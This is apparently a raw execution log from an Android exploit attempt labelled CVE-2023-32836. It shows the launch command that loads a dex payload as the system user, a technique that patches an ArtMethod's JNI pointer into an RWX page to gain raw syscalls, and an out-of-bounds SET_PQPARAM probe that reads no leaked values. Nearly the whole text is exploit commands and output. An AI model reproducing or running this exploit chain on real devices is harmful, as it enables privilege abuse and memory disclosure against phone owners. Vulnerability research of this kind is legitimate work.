command=CLASSPATH=/data/data/com.android.settings/cache/drm_trigger.dex app_process64 /system/bin DrmTrigger infoleak
probe=drm-trigger
dex_md5=df45a784c5930a73c6b6bb49fb4e9f58
dex_sha256=1c8ac224223aafd0855d44957f1bfe1aae837654ab3e31f134af4884eb183b74
remote_dex=/data/data/com.android.settings/cache/drm_trigger.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
df45a784c5930a73c6b6bb49fb4e9f58  /data/data/com.android.settings/cache/drm_trigger.dex
[*] CVE-2023-32836 DRM exploit (Java/dalvikvm)
[*] pid=14001 uid=1000 mode=infoleak
[*] === SET_PQPARAM u4PartialY OOB info leak ===

[+] Scratch buffer at 0x7edffba000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7edffb9000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x7ed32858a0
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x7c1ea1a2c0
    entry_point    = 0x10380008069467e0
[*] Patching data_ (JNI) → 0x7edffb9000
    data_       = 0x7edffb9000 ✓
    entry_point = 0x10380008069467e0 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[+] fd=48
[*] Baseline Y_SLOPE values:
    SLOPE[0] = 0x0
    SLOPE[1] = 0x0
    SLOPE[2] = 0x0
    SLOPE[3] = 0x0
    SLOPE[4] = 0x0
    SLOPE[5] = 0x0
    SLOPE[6] = 0x0
    SLOPE[7] = 0x0

[*] SET_PQPARAM u4PartialY=10, brightness=10, contrast=10...
    ret=0
[*] Waiting 200ms for cmdq flush...
[*] Y_SLOPE after in-bounds pY=10:
    SLOPE[0] = 0x0
    SLOPE[1] = 0x0
    SLOPE[2] = 0x0
    SLOPE[3] = 0x0
    SLOPE[4] = 0x0
    SLOPE[5] = 0x0
    SLOPE[6] = 0x0
    SLOPE[7] = 0x0

[!] Y_SLOPE unchanged after SET_PQPARAM.
    Possible causes:
    - DISP_COLOR module is bypassed/disabled
    - cmdq command not flushed to hardware
    - READ_REG reads shadow vs cmdq writes to real HW
    Trying DISP_COLOR0 config registers:
      COLOR0+0x400 ret=0 val=0x0
      COLOR0+0xc00 ret=0 val=0x0
      COLOR0+0x0 ret=0 val=0x0
    Cross-check other display modules:
      MMSYS_CG0      pa=0x14116000 ret=0 val=0x0
      MMSYS_MOUT     pa=0x14116040 ret=0 val=0x0
      OVL0_EN        pa=0x14000000 ret=0 val=0x0
      OVL0_SRC_CON   pa=0x14000020 ret=0 val=0x0
      RDMA0_GCON     pa=0x14003000 ret=0 val=0x0
      AAL0_EN        pa=0x14009000 ret=0 val=0x0
      GAMMA0_EN      pa=0x1400a000 ret=0 val=0x0
      CCORR0_EN      pa=0x14008000 ret=0 val=0x0

[!] SET_PQPARAM u4PartialY=22 (FIRST OOB)...
    ret=0
[*] Y_SLOPE after OOB pY=22:
    SLOPE[0] = 0x0
    SLOPE[1] = 0x0
    SLOPE[2] = 0x0
    SLOPE[3] = 0x0
    SLOPE[4] = 0x0
    SLOPE[5] = 0x0
    SLOPE[6] = 0x0
    SLOPE[7] = 0x0

[*] Restoring u4PartialY=0...
[*] Done
